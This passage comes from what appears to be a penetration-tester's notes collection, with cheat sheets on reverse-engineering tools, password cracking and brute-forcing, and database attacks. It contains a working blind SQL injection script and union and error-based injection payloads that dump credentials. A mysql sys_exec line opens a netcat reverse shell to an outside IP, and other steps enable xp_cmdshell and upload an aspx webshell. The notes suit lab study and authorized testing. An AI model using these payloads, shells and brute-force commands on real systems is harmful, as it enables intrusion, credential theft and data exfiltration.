importing the binary 11 | in raw format. 12 | 13 | Step 1: Find the desired function to rewrite 14 | Step 2: Right click the function (assembly code in middle screen) -> Patch instruction 15 | Step 3: Rewrite the instruction (for example: change JNZ LAB_000011f4 to JNZ LAB_000023df) 16 | Step 4: File -> Export Program 17 | Step 5: Choose format and output directory/name 18 | Step 6: Run the new program 19 | 20 | Navigate to address: 21 | 22 | Step 1: Navigation -> Go to 23 | Step 2: enter address, label or expression 24 | -------------------------------------------------------------------------------- /binary_exploitation/reverse_engineering/radare2.txt: -------------------------------------------------------------------------------- 1 | Radare2 is a powerful command line reversing tool. 2 | Below are the most common commands you need for reversing a binary: 3 | 4 | Open binary in debug mode: r2 -d 5 | 6 | Analyze binary: aaa aaaa 7 | 8 | List function names: afl 9 | 10 | List strings in binary: izz 11 | 12 | View disassembled functions: VV (interactive view) 13 | pdf 14 | pdf @ # pdf @ sym.main 15 | V! (allows for setting of breakpoints and rewriting functions) 16 | 17 | Rewrite an instruction (in debug mode + V!): move the target address to the top of the screen, then do 'wa ' # works like vi, you need to do ':' first, then write 'wa ' 18 | Set a breakpoint (in debug mode + V!) : move the target address to the top of the screen, then do 'f2' 19 | : open function in pdf mode (pdf @main) and do 'db
' 20 | 21 | Run program: dc 22 | Continue execution: s 23 | 24 | Reopen in debug mode: ood 25 | 26 | Rewrite strings in radare (must be same length to work properly): 27 | 28 | Step 1: r2 -w 29 | Step 2: iz 30 | Step 3: w @
31 | -------------------------------------------------------------------------------- /binary_exploitation/reverse_engineering/recon.txt: -------------------------------------------------------------------------------- 1 | Tools to gather information about a binary (https://ropemporium.com/guide.html): 2 | 3 | Checking what type of file we are dealing with: 4 | 5 | syntax : file 6 | 7 | Checking protections (NX/DEP...) enabled on a binary: 8 | 9 | syntax : rabin2 -I # apt-get install radare2 10 | syntax : checksec 11 | 12 | Checking functions imported from shared libraries: 13 | 14 | syntax : rabin2 -i 15 | syntax : rabin2 -qs 16 | syntax : readelf -s 17 | 18 | Checking strings present in a binary: 19 | 20 | syntax : strings 21 | syntax : rabin2 -z # Only prints strings that were added by a programmer (so not all the default stuff) 22 | 23 | Disassembly of a binary: 24 | 25 | syntax : objdump -d > .asm 26 | syntax : objdump -M -d > .asm # specify different disassembly syntax with -M flag 27 | example: objdump -M intel -d vuln.exe > disassembly_intel.asm 28 | 29 | Check what a binary is actually doing via terminal output: 30 | 31 | syntax : ltrace ./ 32 | 33 | Check function method names of a binary: 34 | 35 | syntax : nm 36 | 37 | Check buffer length needed for overflow: 38 | 39 | Step 1: dmesg -C -> clear ring buffer 40 | Step 2: overflow the binary 41 | Step 3: dmesg -t -> check where crash happened 42 | 43 | Via gdb (with peda installed): 44 | Step 1: gdb 45 | Step 2: pattern_create -> copy the resulting pattern 46 | Step 3: run 47 | Step 4: paste pattern when asked for input 48 | Step 5: grab the ascii value from EIP (x86) or RSP (x64) -> 49 | Step 6: pattern_offset 50 | 51 | Search for certain instructions (gadgets) in a binary: 52 | 53 | syntax : ropper --file --search 54 | example: ropper --file ropme --search 'pop rdi; ret;' 55 | example: ropper --file ropme --search 'mov|pop' 56 | # only search for mov and pop instructions 57 | example: ropper --file ropme -b 4142436545 58 | # exclude bad characters (characters are in hex: 'A' -> '41') 59 | 60 | Check essential information about a binary (mainly to find an address to write a string to): 61 | 62 | syntax : readelf -a 63 | syntax : readelf --sections 64 | 65 | Check what the target section contains: 66 | syntax : readelf -x
67 | example: readelf -x .data vuln.exe 68 | 69 | Check permissions on sections in a binary (find a place to write a string to): 70 | 71 | Step 1: r2 72 | Step 2: aaa 73 | Step 3: iS 74 | -------------------------------------------------------------------------------- /bruteforce/7zCrack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script to crack password-protected 7zip files 3 | # 7zip-JTR Decrypt Script 4 | # 5 | # Clone of JTR Decrypt Scripts by synacl modified for 7zip 6 | # - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ 7 | # - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ 8 | 9 | echo "7zip-JTR Decrypt Script"; 10 | if [ $# -ne 2 ] 11 | then 12 | echo "Usage $0 <7z file> "; 13 | exit; 14 | fi 15 | 7z l $1 16 | 17 | echo "Generating wordlist..." 18 | john --wordlist="$2" --rules --stdout | while read i 19 | do 20 | echo -ne "\rTrying \"$i\" " 21 | 7z x -p$i $1 -aoa >/dev/null 22 | STATUS=$? 23 | if [ $STATUS -eq 0 ]; then 24 | echo -e "\rArchive password is: \"$i\"" 25 | break 26 | fi 27 | done 28 | -------------------------------------------------------------------------------- /bruteforce/fcrackzip.txt: -------------------------------------------------------------------------------- 1 | fcrackzip is a tool made for cracking password-protected ZIP files: 2 | 3 | syntax : fcrackzip -u -D -p .zip 4 | example: fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt suspicious.zip 5 | -------------------------------------------------------------------------------- /bruteforce/generateWordlist.txt: -------------------------------------------------------------------------------- 1 | CAREFUL! Crunch can create very big files in the GB's very quickly. Use the -o flag with care! 2 | 3 | Use crunch to generate wordlists: 4 | 5 | syntax : crunch 6 | example: crunch 1 6 abcdABCDE 7 | 8 | syntax : crunch -t 9 | example: crunch 1 3 -t @@,% 10 | 11 | @ will insert lower case characters 12 | , will insert upper case characters 13 | % will insert numbers 14 | ^ will insert symbols 15 | 16 | 17 | Use crunch to generate a wordlist from existing character sets(check the file for possible character sets): 18 | 19 | syntax : crunch -f -o 20 | example: crunch 1 4 -f /usr/share/crunch/charset.lst lalpha -o dictionary.txt 21 | 22 | -------------------------------------------------------------------------------- /bruteforce/hashcat.txt: -------------------------------------------------------------------------------- 1 | Cracking hashes with hashcat, check the numbers for hashtype on the internet: (https://hashcat.net/wiki/doku.php?id=example_hashes) 2 | Get hashtypes: hashcat --example-hashes | less 3 | syntax : hashcat -m -a -o (--remove) --force 4 | example: hashcat -m 5600 -a 0 -o cracked.txt ntlm2Hash.txt /usr/share/wordlists/rockyou.txt --force 5 | OR 6 | syntax : hashcat -m -o --force 7 | example: hashcat -m 13100 -o cracked.txt adminHash.txt /usr/share/wordlists/rockyou.txt --force 8 | 9 | Cracking hashes with hashcat where salt and hash were found separate: 10 | Step 1: We have found hash: 62def2866337f08cc14bab43bb14e6f7 and salt: 5a569ef575066807 11 | Step 2: We know that this is an MD5 hash, so we save the hash in 'hash.txt' like this: 62def2866337f08cc14bab43bb14e6f7:5a569ef575066807 12 | Step 3: hashcat -m 20 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt --force 13 | 14 | Generate a wordlist with hashcat's bruteforce mode: 15 | syntax : hashcat --stdout -a | tee # hashcat -h -> look for charset 16 | example: hashcat --stdout -a 3 secret1?d?s | tee wordlist.txt 17 | 18 | Crack hashes with a mask attack (we know the password policy is one uppercase letter, 8 min length and one digit): 19 | Check hashcat -h for charsets and use them accordingly (1 = a-z): 20 | syntax : hashcat -a -m 21 | example: hashcat -a 3 -m 1000 ntlm.txt ?u?l?l?l?l?l?l?d 22 | 23 | What if end of the password could be either a number or a special character: 24 | syntax : hashcat -a -m -1 25 | example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?1 26 | # ?1 here is our custom charset (?d?s) 27 | example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s EvilCorp?1?d 28 | 29 | extra info: '-m' specifies which hash-type it is, '-a' specifies what kind of attack we need (0 is a dictionary attack), all hashes to be cracked should be in the 'hashFile' 30 | if needed, add the '--remove' flag to remove the hashes from the 'hashFile' if they have been cracked 31 | -------------------------------------------------------------------------------- /bruteforce/hydra.txt: -------------------------------------------------------------------------------- 1 | Hydra is an all-round bruteforcing tool used on multiple different services 2 | 3 | Extra options: 4 | -f: Stop on the first correct combination 5 | -V: Verbose (print all combinations) 6 | -u: When using a userlist, this option tries one password on every user, 7 | before moving on to the next password. Default tries all passwords 8 | for one user, before moving on to the next user. 9 | 10 | Hydra bruteforce on a web directory that requires authentication through a popup form (basic authorization header): 11 | 12 | syntax : hydra -V -f -l/-L -p/-P 13 | example: hydra -V -f -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.11 http-get /admin 14 | 15 | 16 | Hydra bruteforce on an html login form (use burp-suite to check ): 17 | 18 | syntax : hydra -V -l/-L -p/-P "::" 19 | example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!" 20 | example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-get-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!" 21 | 22 | 23 | # With JSON POST data, different port, and headers 24 | 25 | syntax : hydra -V -f -s -l/L -p/-P ":::H=
" 26 | example: hydra -V -f -s 8081 -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.19 http-post-form "/artifactory/ui/auth/login?_spring_security_remember_me=false:{\"user\"\:\"^USER^\",\"password\"\:\"^PASS^\",\"type\"\:\"login\"}:Username or password are incorrect:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=Content-Type: application/json:H=Request-Agent: artifactoryUI:H=serial: 16:H=X-Requested-With: artUI" 27 | 28 | Hydra bruteforce on an oracle tns listener (default port 1521): 29 | 30 | syntax : hydra -V -f -P -t -s 31 | example: hydra -V -f -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 11.12.10.82 oracle-listener 32 | 33 | 34 | Hydra bruteforce to crack ssh credentials: 35 | 36 | syntax : hydra -l/-L -p/-P ssh:// 37 | example: hydra -V -f -L userlist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.7 38 | 39 | 40 | Hydra bruteforce to crack rdp credentials: 41 | 42 | syntax : hydra -V -f -l/-L -p/-P rdp:// 43 | example: hydra -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.5.12.3 44 | 45 | -------------------------------------------------------------------------------- /bruteforce/john.txt: -------------------------------------------------------------------------------- 1 | John is a very popular password cracking tool 2 | 3 | 4 | To crack a private SSH key with John: 5 | 6 | Step 1: /opt/JohnTheRipper/run/ssh2john.py > 7 | Step 2: john --wordlist=/usr/share/wordlists/rockyou.txt 8 | 9 | 10 | To crack a unix shadow file: 11 | 12 | Step 1: unshadow passwd.txt shadow.txt > 13 | Step 2: john --wordlist=/usr/share/wordlists/rockyou.txt 14 | Step 3: john --show 15 | 16 | 17 | Check for passwords to crack in zip files: 18 | 19 | Step 1: zip2john .zip 20 | Step 2: john -w: 21 | Step 3: john --show 22 | Step 4: 7z x .zip 23 | 24 | 25 | Crack a keepass database (with a key file) with john: 26 | 27 | Step 1: keepass2john -k key.png secrets.kdbx > secrets.hash 28 | Step 2: john -w: 29 | Step 3: john --show 30 | 31 | 32 | To crack an encrypted SSH key with John (DES-EDE3-CBC): 33 | 34 | Step 1: sshng2john.py > 35 | Step 2: crack file... 36 | -------------------------------------------------------------------------------- /bruteforce/openssl.txt: -------------------------------------------------------------------------------- 1 | 'bruteforce-salted-openssl' is a bruteforcing tool to crack openssl encrypted plaintext. 2 | 3 | 4 | syntax : bruteforce-salted-openssl -t -f -c -d 5 | example: bruteforce-salted-openssl -t 15 -f /usr/share/wordlists/rockyou.txt -c aes-256-cbc -d sha256 pass_enc.txt 6 | -------------------------------------------------------------------------------- /bruteforce/padbusterCookie.txt: -------------------------------------------------------------------------------- 1 | padbuster is a tool that can bruteforce encrypted cookies by using a 'padding oracle' attack: 2 | 3 | syntax : padbuster -cookies "" 4 | example: padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5" 5 | 6 | Then after we find the format of the cookie, we put it at the end as '-plaintext': 7 | 8 | padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5" -plaintext {"user":"nomad","role":"admin"}" 9 | -------------------------------------------------------------------------------- /bruteforce/password-spray.txt: -------------------------------------------------------------------------------- 1 | All kinds of tools to use for online password spraying 2 | 3 | Use atomizer to bruteforce email accounts (https://github.com/byt3bl33d3r/SprayingToolkit): 4 | syntax : atomizer.py 5 | example: atomizer.py owa mail.ecorp.io Washington2020 emails.txt 6 | 7 | syntax : atomizer.py --interval 8 | example: atomizer.py owa mail.ecorp.io passwords.txt emails.txt --interval 0:0:1 9 | # after trying a password for all emails in the list, wait one second and then 10 | continue with the next password 11 | -------------------------------------------------------------------------------- /bruteforce/patator.txt: -------------------------------------------------------------------------------- 1 | Patator is a multi-purpose bruteforcing tool 2 | 3 | patator for SSH bruteforce 4 | 5 | syntax : patator host= port= user= password=FILE0 0= persistent=0 -x ignore:mesg='' 6 | example: patator ssh_login host=10.12.32.41 port=26478 user=tyrone password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.' 7 | -------------------------------------------------------------------------------- /bruteforce/pdfCrack.txt: -------------------------------------------------------------------------------- 1 | pdfcrack is a tool made for cracking password-protected PDF files: 2 | 3 | syntax : pdfcrack -f '.pdf' -w 4 | example: pdfcrack -f 'creditcards.pdf' -w /usr/share/wordlists/rockyou.txt 5 | -------------------------------------------------------------------------------- /bruteforce/rdp.txt: -------------------------------------------------------------------------------- 1 | Use ncrack to bruteforce remote desktop credentials: 2 | 3 | # -f: stop after 1 found credential, ',CL=1' = one connection at a time 4 | 5 | syntax : ncrack -v -f --user -P rdp://,CL=1 6 | example: ncrack -v -f --user administrator -P /usr/share/wordlist/rockyou.txt rdp://10.132.12.3,CL=1 7 | -------------------------------------------------------------------------------- /certificates/generateCA.txt: -------------------------------------------------------------------------------- 1 | Use openssl to generate a new CA (https://gist.github.com/Soarez/9688998) 2 | 3 | Step 1 : openssl genrsa -out .key 2048 4 | Optional: openssl rsa -in .key -pubout -out .pubkey # generate public key from private key 5 | Step 2 : openssl req -new -key .key -out .csr # generate a CSR (Certificate Signing Request) 6 | Step 3 : Submit the '.csr' file to an 'Active Directory Certificate Service' # this is how you get the '.cer' file 7 | -------------------------------------------------------------------------------- /certificates/openssl.txt: -------------------------------------------------------------------------------- 1 | Openssl is a tool for various cryptography functions 2 | 3 | 4 | Use openssl to convert a cert and key to a PKCS12 file: 5 | 6 | syntax : openssl pkcs12 -export -out .p12 -in -inkey 7 | example: openssl pkcs12 -export -out capsule_corp.p12 -in capsule.cert.pem -inkey capsule.key.pem 8 | -------------------------------------------------------------------------------- /databases/nosql/mongo/mongo.txt: -------------------------------------------------------------------------------- 1 | MongoDB is a no-sql database 2 | 3 | Install mongo on kali (https://docs.mongodb.com/v3.0/tutorial/install-mongodb-on-linux/) : 4 | 5 | Step 1: curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.0.15.tgz 6 | Step 2: tar -zxvf mongodb-linux-x86_64-3.0.15.tgz 7 | 8 | 9 | Use mongo to connect to a remote server: 10 | 11 | syntax : mongo -u -p :27017/ 12 | example: mongo -u daryl -p Cr055BoW 10.10.23.41:27017/clients 13 | 14 | 15 | Use mongo to connect to a local server with creds: 16 | 17 | syntax : mongo -p -u 18 | example: mongo -p -user aladeen clients 19 | -------------------------------------------------------------------------------- /databases/sql/blindSqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | # Based on Ippsec's video of hackthebox 'Falafel' (https://www.youtube.com/watch?v=CUbWpteTfio) 4 | 5 | # for ((i=32;i<127;i++)) do printf "\\$(printf %03o "$i")"; done; printf "\n" -> print all characters of the ascii table 6 | 7 | import requests 8 | 9 | postUrl = 'http://10.10.10.73/login.php' 10 | chars = '0123456789abcdefghijklmnopqrstuvwxyz' 11 | 12 | # This is the message we want to see for a successful injection 13 | errorMsg = 'Wrong identification' 14 | 15 | # Perform the blind sql injection 16 | def doSqli(index, character): 17 | return f"admin' and substr(password,{index},1) = '{character}'-- -" 18 | ### 19 | 20 | for i in range(1,150): 21 | for c in chars: 22 | sqli = doSqli(i, c) 23 | 24 | # The post parameters 25 | payload = {'username':sqli, 'password':'admin'} 26 | 27 | # The actual POST request 28 | r = requests.post(postUrl, data = payload) 29 | 30 | if errorMsg in r.text: 31 | print(c, end='', flush=True) 32 | break 33 | ### 34 | 35 | ### 36 | ### 37 | print() 38 | -------------------------------------------------------------------------------- /databases/sql/blindSqli.txt: -------------------------------------------------------------------------------- 1 | Blind SQL Injection attack steps, tested on mysql(start from -> http://vulnsite.com/clients.php?id=150): 2 | 3 | # Important note! For Sql injection comments (--) to work, you need to include a space at the end (-- ) or (-- -) 4 | 5 | Step 1: id=150' -> error is not visible, so try blind injection 6 | Step 2: id=150 and 1=1-- -> same output? Try (id=150 and 1=2--) -> if this gives no output anymore, you have a sql injection 7 | Step 3: id=150 or sleep(5) -> page takes longer than 5 seconds to load, then you have a sql injection 8 | 9 | Step 4: enumeration phase -> We use 'if' statements with 'sleep' to see what data exists and what doesn't (there are scripts for this) 10 | # Say that we know '@@version' returns 'mysql 3.5.0', then we can do a test to see if our enumeration query works 11 | # So we can do 'select if(mid(@@version,1,1) = 'm', sleep(5), 0)', this sleeps for 5 seconds if the first character returned is 'm' 12 | # If this query takes 5+ seconds to run, it means it's true 13 | -------------------------------------------------------------------------------- /databases/sql/mssql/mssql.txt: -------------------------------------------------------------------------------- 1 | Useful commands for pentesting Microsoft SQL Server instances: 2 | 3 | # Get current database 4 | example: SELECT DB_NAME(); 5 | 6 | # Get all databases 7 | example: SELECT name FROM master..sysdatabases; 8 | 9 | # Show all tables of current database 10 | example: select * from information_schema.tables; 11 | 12 | # Show all columns of table 13 | syntax : select * from information_schema.colums where table_name = ''; 14 | 15 | # Show all users 16 | example: use master; select * from sys.syslogins; 17 | 18 | # Show all user password hashes 19 | syntax : select loginproperty('', 'PasswordHash'); 20 | 21 | # Create user 22 | syntax : exec master..sp_addlogin , ; 23 | syntax : create login with password=''; 24 | 25 | # Select users with sysadmin rights 26 | example: select loginname from syslogins where sysadmin = 1; 27 | 28 | ## Check if current user is in given role 29 | syntax : select is_srvrolemember(''); 30 | example: select is_srvrolemember('sysadmin'); 31 | 32 | # Add user to certain role 33 | syntax : exec sp_addsrvrolemember '', ''; 34 | example: exec sp_addsrvrolemember 'developer', 'sysadmin'; 35 | 36 | # Enable xp_cmdshell to execute commands on the underlying system 37 | Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1 38 | Step 2(host): reconfigure 39 | Step 3(host): go 40 | Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1 41 | Step 5(host): reconfigure 42 | Step 6(host): go 43 | 44 | Optional step 7(host): xp_cmdshell 'whoami' 45 | Optional Step 7(host): go 46 | 47 | # Check linked servers and execute commands on them 48 | Step 1 : sp_linkedservers 49 | # select * from master..sysservers 50 | Step 2 : EXECUTE('') AT "" 51 | example: EXECUTE(' select * from information_schema.tables where table_schema = ''secrets'' ') AT "ECORP\SECRET_DB" 52 | example: select * from openquery("ECOPR\SECRET_DB",'select @@version') 53 | -------------------------------------------------------------------------------- /databases/sql/mssql/mssqlclient.txt: -------------------------------------------------------------------------------- 1 | Connect to a remote mssql instance using Impacket's mssqclclient: 2 | 3 | syntax : python mssqlclient.py ':'@ 4 | example: python /opt/Impacket/examples/mssqlclient.py 'Administrator:L0cal4dm1N'@10.15.15.15 -windows-auth 5 | -------------------------------------------------------------------------------- /databases/sql/mssql/sqsh.txt: -------------------------------------------------------------------------------- 1 | SQL interactive shell to connect with SQL server: 2 | 3 | syntax : sqsh -S -U -P 4 | example: sqsh -S 10.12.12.32 -U sa -P MyP4ssW0RD 5 | 6 | 7 | Enable xp_cmdshell to execute system commands(https://www.youtube.com/watch?v=l-wzBhc9wFc 26:22): 8 | 9 | Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1 10 | Step 2(host): reconfigure 11 | Step 3(host): go 12 | Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1 13 | Step 5(host): reconfigure 14 | Step 6(host): go 15 | 16 | Optional step 7(host): xp_cmdshell 'whoami' 17 | Optional Step 7(host): go 18 | -------------------------------------------------------------------------------- /databases/sql/mysql.txt: -------------------------------------------------------------------------------- 1 | Connect to mysql instance: 2 | 3 | syntax : mysql -u -p 4 | example: mysql -u borat -p 5 | example: mysql -h 10.12.45.43 -u borat -p 6 | 7 | 8 | List all tables of all databases (in mysql CLI): 9 | 10 | example: select TABLE_NAME from information_schema.tables; 11 | 12 | 13 | List all databases (in mysql CLI): 14 | 15 | example: show databases; 16 | 17 | 18 | Execute system commands: 19 | 20 | Step 1: Check if you can actually run system commands on mysql 21 | command: locate udf 22 | # Check if /usr/lib/lib_mysqludf_sys.so is present 23 | 24 | command: select * from mysql.func; 25 | # Check if sys_exec and udf are enabled 26 | 27 | Step 2: Execute system commands 28 | 29 | syntax : select sys_exec(''); 30 | example: select sys_exec('usermod -a -G sudo john'); 31 | example: select sys_exec('usermod -u 0 john'); 32 | example: select sys_exec('nc -e /bin/sh 192.168.0.123 443'); 33 | -------------------------------------------------------------------------------- /databases/sql/oracle/cli.txt: -------------------------------------------------------------------------------- 1 | Command line commands for oracle cli (https://www.youtube.com/watch?v=2c7SzNo9uoA) 2 | 3 | 4 | Basic commands: 5 | select * from sessions_privs; 6 | select table_name from user_tables; 7 | 8 | Read a file on disk (enter after each line): 9 | 10 | declare 11 | f utl_file.file_type; 12 | s varchar(200); 13 | begin 14 | f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R'); 15 | utl_file.get_line(f,s); 16 | utl_file.fclose(f); 17 | dbms_output.put_line(s); 18 | end; 19 | / 20 | set serveroutput on 21 | / 22 | 23 | # f := utl_file.fopen('', '', ''); 24 | -------------------------------------------------------------------------------- /databases/sql/oracle/odat.txt: -------------------------------------------------------------------------------- 1 | Odat is a multi-purpose tool for oracle databases (odat -h, odat -h) 2 | 3 | 4 | Use odat to enumerate SID on an oracle TNS listener: 5 | 6 | syntax : odat sidguesser -s -p 7 | example: odat sidguesser -s 10.12.32.12 -p 1521 8 | 9 | 10 | Use odat to bruteforce passwords on an oracle TNS listener with known SID: 11 | 12 | syntax : odat passwordguesser -s -p -d 13 | example: odat passwordguesser -s 10.10.10.82 -p 1521 -d CLIENTS 14 | example: odat passwordguesser -s 12.12.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/oracle_default_userpass.txt # /usr/share/metasploit-framewoek/data/wordlists/oracle_default_userpass.txt 15 | 16 | 17 | Use odat to upload/get files: 18 | 19 | get privilege: 20 | syntax : odat privesc -s -d -U -P --sysdba --dba-with-execute-any-procedure 21 | example: odat privesc -s 10.12.13.42 -d CLIENTS -U tyrone -P passw0rd --sysdba --dba-with-execute-any-procedure 22 | upload: 23 | syntax : odat dbmsxslprocessor -s -U -P -d -sysdba -putFile '' '' '/' 24 | example: odat dbmsxslprocessor -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile ‘C:\\inetpub\\wwwroot\\‘ ‘venom.aspx’ ‘/usr/share/webshells/aspx/cmdasp.aspx’ 25 | example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx 26 | 27 | get: 28 | example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --getFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx 29 | 30 | 31 | Use odat to execute scripts/commands: 32 | 33 | syntax : odat externaltable -s -U -P -d --sysdba --exec 34 | example: odat externaltable -s 10.12.14.82 -U tyrone -P passw0rd -d CLIENTS --sysdba --exec C:\\inetpub\\wwwroot venom.exe 35 | -------------------------------------------------------------------------------- /databases/sql/oracle/oscanner.txt: -------------------------------------------------------------------------------- 1 | oscanner is used to enumerate SID (Service Identifier), which is the database name 2 | 3 | syntax : oscanner -s -P 4 | example: oscanner -s 10.15.10.82 -P 1521 5 | -------------------------------------------------------------------------------- /databases/sql/oracle/sqlplus.txt: -------------------------------------------------------------------------------- 1 | Use sqlplus to connect to an Oracle DB instance: 2 | 3 | syntax : sqlplus /@:/ 4 | example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS 5 | example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS as sysdba # Kinda like sudo 6 | -------------------------------------------------------------------------------- /databases/sql/oracle/tnscmd.txt: -------------------------------------------------------------------------------- 1 | Use tnscmd to perform certain commands on an oracle listener (default port 1521) 2 | 3 | syntax : tnscmd10g -h 4 | example: tnscmd10g status -h 10.12.32.41 # Error probably means it's password protected 5 | -------------------------------------------------------------------------------- /databases/sql/postgresqlCli.txt: -------------------------------------------------------------------------------- 1 | Use PostgreSql from command line: 2 | 3 | syntax : psql -h -d -U -W 4 | example: psql -h localhost -d clients -U tyrone -W 5 | 6 | -------------------------------------------------------------------------------- /databases/sql/sqli.txt: -------------------------------------------------------------------------------- 1 | SQL Injection attack steps(start from -> http://vulnsite.com/clients.php?id=150): 2 | 3 | # Important note! For Sql injection comments (--) to work, you need to include a space at the end (-- ) or (-- -) 4 | 5 | Step 1: id=150' -> if sql error is not visible, you need to do blind SQL injection 6 | 7 | Step 2: id=150 order by 1-- - 8 | # Try to use ;# at the end to comment out the next query 9 | # Increment the order number until you hit error to find out how many columns there are 10 | # Say you get an error at 'id=150 order by 9-- -' -> this means there are 8 columns available 11 | 12 | Step 3: id=150 union select 1,2,3,4,5,6,7,8 13 | # See what column numbers appear on the website somewhere, those are vulnerable 14 | # Say we only see column 3, 5 and 8 on the screen 15 | 16 | Step 4: id=150 union all select 1,2,user(),4,@@version,6,7,8 17 | 18 | Step 5: id=150 union all select 1,2,3,4,table_name,6,7,8 FROM information_schema.tables 19 | # extract all tablenames 20 | # This is the syntax for SQL Server, might not work for other SQL versions 21 | 22 | Step 6: id=150 union all select 1,2,3,4,5,6,7,column_name FROM information_schema.columns where table_name='' 23 | # Say we find table 'clients' with columns 'name', 'password', 'credit_card', 'not_important' 24 | 25 | Step 7: id=150 union select 1,2,name,4,password,6,7,credit_card FROM clients 26 | # This will dump all the data on the website for us to see 27 | # (if it's a stored SQL injection, anyone who browses to that page will see the data dump) 28 | 29 | 30 | Sql injection queries: 31 | 32 | Test for vulnerable columns (sometimes you need to limit to 1 result and supply a negative index so we can properly see output): 33 | 34 | syntax : http://vulnerable.org/items?id=-1 union all select LIMIT 1-- - 35 | example: http://vulnerable.org/items?id=-1 union all select 1,2,3,4,5,6,7 LIMIT 1-- - 36 | 37 | 38 | Load a file's contents if permission is enabled: 39 | 40 | syntax : id=150 union all select 1,2,3,4,5,6,7,load_file("") 41 | example: id=150 union all select 1,2,3,4,5,6,7,load_file("c:\Users\Derrick\Desktop\password.txt") 42 | 43 | 44 | Upload a file to a remote server if permission is enabled: 45 | 46 | syntax : id=150 union all select 1,2,3,4,"",6,7,8 into outfile '' 47 | example: id=150 union all select 1,2,3,4,"",6,7,8 into outfile '/var/www/html/upload.php' 48 | 49 | 50 | Useful queries per database version: 51 | 52 | MYSQL: 53 | Blind SQL Injection: 54 | # time-based 55 | syntax : ' AND (SELECT CASE WHEN ((SELECT hex(substr(,,1)) FROM LIMIT ,1) = hex('')) THEN sleep(
LIMIT ,1) = hex('')) THEN 1 ELSE 0 END));-- - 60 | example: ' AND (SELECT CASE WHEN ((SELECT hex(substr(table_name,1,1)) FROM information_schema.tables LIMIT 0,1) = hex('a')) THEN 1 ELSE 0 END));-- - 61 | 62 | MSSQL: 63 | Blind SQL Injection: 64 | # error-based enumerate readable databases 65 | syntax : or 1 in (SELECT TOP 1 CAST(db_name() as varchar(4096)));-- - 66 | example: or 1 in (SELECT TOP 1 CAST(db_name(1) as varchar(4096)));-- - 67 | 68 | # error-based enumerate database tables 69 | syntax : or 1 in (SELECT TOP 1 CAST( as varchar(4096)) FROM ..
WHERE xtype='U' and NOT IN ()); -- - 70 | example: or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM master..sysobjects WHERE xtype='U' and name NOT IN ('users', 'employees')); -- - 71 | 72 | # error-based enumerate table columns 73 | syntax : or 1 in (SELECT TOP 1 CAST (..syscolumns.name as varchar(4096)) FROM ..syscolumns, ..sysobjects WHERE ..syscolumns.id=..sysobjects.id 74 | AND ..sysobjects.name= AND ..syscolumns.name NOT IN ()); -- - 75 | example: or 1 in (SELECT TOP 1 CAST (cms..syscolumns.name as varchar(4096)) FROM cms..syscolumns, cms..sysobjects WHERE cms..syscolumns.id=cms..sysobjects.id 76 | AND cms..sysobjects.name=cms_users AND cms..syscolumns.name NOT IN ('id', 'username', 'address')); -- - 77 | 78 | # error-based extract column data 79 | syntax : or 1 in (SELECT TOP 1 CAST ( as varchar(4096)) FROM ..
